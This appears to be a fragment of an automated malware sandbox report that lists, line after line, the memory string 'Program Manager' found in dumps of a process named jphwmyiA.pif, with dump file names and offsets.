Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4\|
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,ku*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh.i*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<@N*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxKR*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8$}
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q#
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtD/*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q&
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4q
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhvw%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4o
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4n
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4l
Source: jphwmyiA.pif, 00000003.00000003.3505484079.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4k
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\p%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4x
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4u
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4s
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4r
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtPS*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpI0*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLD*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0$
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX,_%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdIU%
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0"
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q i]%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$iP*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8EO*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh3]*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd{x%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql{_*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|Wi%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`3v%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0Eh%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0<
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0E
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q i^*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|mV%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,ph*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0?
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0>
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0+
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0)
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$(r%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0'
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql{^%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX%/*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q00
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL%T%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp:s%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0]
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0W
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpPa*
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0`
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0_
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHii%
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0L
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPH~
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0J
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerT
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q((g*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0H
Source: jphwmyiA.pif, 0000000C.00000003.3415476693.000000001BC3A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|Wk*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q({q
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0Q
Source: jphwmyiA.pif, 00000007.00000003.3895754051.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0O
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0}
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0Ej*
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0z
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0x
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX,`*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0w
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDbE*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0l
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0k
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpP`%
Source: jphwmyiA.pif, 00000003.00000003.3895756731.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager4
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4E]*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0u
Source: jphwmyiA.pif, 00000003.00000003.3895756731.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0t
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0s
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(pv*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0q
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$>_%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXY}
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0p
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0n
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL{9*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt{C*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<3\%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,SI*
Source: jphwmyiA.pif, 00000007.00000003.3755600908.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager0
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q p~
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH37*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp3A*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qmj*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q L>*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q)m
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLGs
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,6
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,5
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,>
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh^M*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`pu
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL:Y%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,)
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0Zm%
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,'
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,$
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,#
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@/p
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,0
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,/
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,,
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,+
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8]{*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx:Z*
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,X
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,V
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`tS%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,T
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$!@*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q Sp%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,R
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,`
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(iB*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,[
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qmh%
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@,r
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql3O*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp{Q*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlt.*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,C
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,Q
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,O
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8wq%
Source: jphwmyiA.pif, 0000000C.00000003.3505492923.000000001BBBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,M
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,J
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,u
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q%[*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd^[*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,s
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTUt
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHPR%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8,:*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,g
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,d
Source: jphwmyiA.pif, 00000003.00000003.3415442187.0000000025A16000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,b
Source: jphwmyiA.pif, 00000003.00000002.4136903739.00000000254EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTW]%
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|:L*
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,p
Source: jphwmyiA.pif, 00000007.00000003.3625437237.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,\|~*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4pM*
Source: jphwmyiA.pif, 00000003.00000003.3625441249.0000000025A16000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,l
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|=s*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<4I*
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH1
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH0
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH.
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A684000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH>{*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH<
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A2BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\\9*
Source: jphwmyiA.pif, 00000007.00000002.4138636535.000000002A3BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4u@*
Source: jphwmyiA.pif, 0000000C.00000002.4134798302.000000001BA60000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4134798302.000000001B7C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH:
Source: jphwmyiA.pif, 00000007.00000003.3505509226.000000002A7E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH7
Source: jphwmyiA.pif, 00000003.00000002.4136903739.0000000025658000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q6s%
